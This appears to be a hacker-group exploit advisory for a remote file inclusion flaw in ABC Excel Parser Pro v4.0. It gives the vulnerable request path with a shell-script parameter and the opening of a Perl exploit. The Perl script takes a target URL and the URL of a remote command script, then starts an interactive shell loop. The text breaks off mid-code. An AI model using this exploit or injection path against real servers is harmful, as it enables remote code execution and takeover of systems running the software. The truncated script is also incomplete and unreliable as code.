| 
 | 
 """""""""""""""""""""""""""""""""""""""""""""""
 """  ::     ::                :::::   ::::  """
 """   ::   ::                 ::  :   ::    """
 """     ::::    ::   :: ::::: :::::   ::::  """
 """    ::  ::   ::: ::: :: :: ::  ::    ::  """
 """  ::      :: :: :  : ::::: ::   :: ::::  """
 """                                         """
 """""""""""""""""""""""""""""""""""""""""""""""
    Xmor$ Security Vulnerability Research TM
# Tilte: ABC Excel Parser Pro v4.0 Remote File Include Exploit
# Author..................: [the_Edit0r]
# Location ...............: [Iran]
# Homepage ...............: [Www.XmorS-sEcurity.coM] 
[Www.XmorS.coM] [Www.XmorS.neT] 
# Software ...............: [ABC Excel Parser] 
# Impact..................: [Remote]
# Advisory ...............: [Www.XmorS-sEurity.coM/advisory/excelparser(rfi).txt] 
# Site Script ............: [http://phpexcel.h11.ru/] 
# We ArE .................: [Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel]
# SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM] 
# Vulnerabilities ........: 
www.example.com/[path]/[path]/sample/xls2mysql/parser_path=[Shell-Script] 
           
-------------------------------- Exploit --------------------------------------------
#!/usr/bin/perl
use LWP::UserAgent;
$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
head();
while()
{
       print "[shell] \$";
while(